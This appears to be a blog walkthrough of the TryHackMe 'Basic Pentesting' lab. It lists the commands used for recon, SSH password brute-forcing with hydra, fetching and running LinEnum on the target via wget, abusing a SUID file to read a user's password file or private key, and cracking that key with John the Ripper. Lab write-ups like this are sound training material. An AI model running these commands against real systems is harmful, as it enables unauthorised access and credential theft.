Contrxl’s Substack

Contrxl’s Substack

Share this post

Contrxl’s Substack
Contrxl’s Substack
Basic Pentesting - {TryHackMe}
Copy link
Facebook
Email
Notes
More

Basic Pentesting - {TryHackMe}

The URL for this room is: https://tryhackme.com/room/basicpentestingjt

Contrxl
May 29, 2024

Share this post

Contrxl’s Substack
Contrxl’s Substack
Basic Pentesting - {TryHackMe}
Copy link
Facebook
Email
Notes
More
Share

Recon

Begin by running nmap -sC -sV -vv -oN nmap/init [IP_ADDR] to identify any open ports or potentially vulnerable services. This reveals six open ports on the machine. The main page hosting the web server is an “Under Maintenance”. Checking the page source will reveal a comment advising to check the “dev note” section to find out what to work on.

Next, run gobuster dir -u http:/[IP_ADDR] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt to find another page.

Terminal output of Gobuster command showing /development page.

The revealed /development page hosts two files: dev.txt and j.txt.

Snip of the text output in the /dev.txt and /j.txt files.

Knowing that SMB has been configured, a tool like Enum4Linux can be used by running enum4linux -a [IP_ADDR] to enumerate the SMB shares and groups. This reveals two users: jan and kay. This also reveals that anonymous access is possible with a blank username/password.

Terminal output showing anonymous access is available
Terminal output showing Jan and Kay users.

Exploiting

With these usernames and the knowledge that there is a weak password set, run:

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.176.209

After a few minutes, this should return the password for jan.

Terminal output of Hydra command showing user Jan's password.

Privilege Escalation

A tool like LinEnum can be used to identify avenues of privilege escalation. This can be moved and executed on the target by using:

python3 -m http.server 80 //Run on own machine
wget [YOUR_IP]/LinEnum.sh //Run on target machine
chmod +x LinEnum.sh //Run on target machine
./LinEnum.sh

This returns a lot of information and picks up on a SUID bit file.

Terminal output showing SUID file identified.

This can then be used to read the contents of any file on the system. In the home directory for kay there is a file containing their password which can be read.

Password for kay user taken from file.

Another way to achieve this is to use the SUID bit to read the /.ssh/id_rsa file for the kay user. Once open, copy the id_rsa key to a file and crack it with John the Ripper by running:

ssh2john id_rsa 
john --wordlist /usr/share/wordlists/rockyou.txt id_rsa_hash.txt

This will reveal the password and allow a connection to be made using SSH.

More detailed info on commands etc. used here can be found in my GitBook notes below - happy hacking!

GitBook

Thanks for reading Contrxl’s Substack! Subscribe for free to receive new posts and support my work.

Share this post

Contrxl’s Substack
Contrxl’s Substack
Basic Pentesting - {TryHackMe}
Copy link
Facebook
Email
Notes
More
Share

Discussion about this post

No posts

Ready for more?

© 2025 Contrxl
Privacy ∙ Terms ∙ Collection notice
Start WritingGet the app
Substack is the home for great culture

Share

Copy link
Facebook
Email
Notes
More